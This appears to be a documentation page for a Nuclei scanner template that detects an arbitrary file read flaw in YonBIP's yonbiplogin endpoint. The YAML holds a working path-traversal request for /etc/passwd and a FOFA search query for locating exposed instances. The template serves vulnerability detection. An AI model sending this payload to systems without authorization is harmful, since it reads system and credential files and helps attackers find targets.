YonBIP - Arbitrary File Read
ID: yonyou-yonbip-lfi
Severity: high
Author: l1b3r
Tags: yonyou,yonbip,lfi
Description
Section titled “Description”There is an arbitrary file reading vulnerability in yonbiplogin, the advanced version of YonBIP
YAML Source
Section titled “YAML Source”id: yonyou-yonbip-lfi
info: name: YonBIP - Arbitrary File Read author: l1b3r severity: high description: | There is an arbitrary file reading vulnerability in yonbiplogin, the advanced version of YonBIP reference: - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BYonBIP%E9%AB%98%E7%BA%A7%E7%89%88yonbiplogin%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 1 fofa-query: title="YonBIP" || title="数字化工作台" tags: yonyou,yonbip,lfi
http: - method: GET path: - "{{BaseURL}}/iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js"
matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body)" - 'contains(content_type, "application/javascript")' - "status_code == 200" condition: and# digest: 4a0a0047304502205cb707e0ee1997a014d1781f7250c39ebf38122336b74101a5cd1e5220314733022100ce00d1d65c1be5173814800073fe30e9c840e1639b6f1b47e907a9adfc69d9ce:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/yonyou-yonbip-lfi.yaml"